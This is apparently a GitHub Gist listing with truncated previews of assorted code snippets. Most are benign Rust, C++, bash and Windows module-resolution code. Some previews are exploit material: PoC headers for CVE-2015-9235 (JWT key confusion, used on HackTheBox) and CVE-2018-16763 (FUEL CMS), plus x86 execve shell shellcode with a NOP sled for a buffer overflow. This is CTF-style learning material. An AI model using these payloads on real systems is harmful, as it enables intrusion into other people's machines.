This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Copyright (C) 2015, Samsung Electronics, Co., Ltd. All Rights Reserved. | |
# # Written by System S/W 2 Group, S/W Platform R&D Team, | |
# # Mobile Communication Division. | |
# ## | |
# | |
# ## | |
# # Project Name : pyodin | |
# # |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
if [ "$#" -ne 2 ]; then | |
echo "Usage: $0 [N] [IPv4]" | |
exit 1 | |
fi | |
N=$1 | |
IP=$2 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// | |
// An implementation of GetModuleHandle and GetProcAddress that works with manually mapped modules, forwarded exports, | |
// without a CRT standard library, and uses no Windows API or dependencies. | |
// | |
// Author: Bill Demirkapi | |
// License: MIT, appended at the bottom of this document if you care about licensing and want to credit me in your own project. | |
// | |
#include <Windows.h> | |
#include <winternl.h> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
use anyhow::{anyhow, Result}; | |
fn main() -> Result<()> { | |
let v = vec![false, true, true]; | |
let res = v.iter().map(|x| { | |
println!("looped"); // Loops only two times, not 3. | |
if *x { | |
Err(anyhow!("error")) | |
} else { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
use ignore::WalkBuilder; | |
use ignore::overrides::OverrideBuilder; | |
fn main() { | |
let folder = "/tmp/files"; | |
let mut override_builder = OverrideBuilder::new(folder); | |
override_builder.add("!test.txt").unwrap(); | |
override_builder.add("!test.rs").unwrap(); | |
let or = override_builder.build().unwrap(); | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <iostream> | |
void help() { | |
std::cout << "Help" << std::endl; | |
} | |
void option1(std::string arg) { | |
std::cout << "option1: " << arg << std::endl; | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
""" | |
CVE-2015-9235 PoC, known as | |
"JWT HS/RSA key confusion vulnerability". | |
This PoC was used to solve the HTB challenge | |
"Under Construction" on HackTheBox (HTB). | |
USAGE: | |
== | |
Token was obtained by logging into the |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
""" | |
FUEL CMS v1.4.1 CVE-2018-16763 PoC. | |
This PoC was derived from: https://www.exploit-db.com/exploits/47138. | |
""" | |
import argparse | |
import urllib | |
import requests | |
parser = argparse.ArgumentParser('Fuel CMS v1.4 CVE-2018-16763 PoC') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
BUF_SIZE=112 | |
shellcode = "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f" | |
shellcode += "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd" | |
shellcode += "\x80" | |
NOP_SLED = "\x90" * (BUF_SIZE - len(shellcode)) | |
#0xffffd49c | |
#0xffffd4ac | |
#0xffffd440 | |
#0xffffd43c |
NewerOlder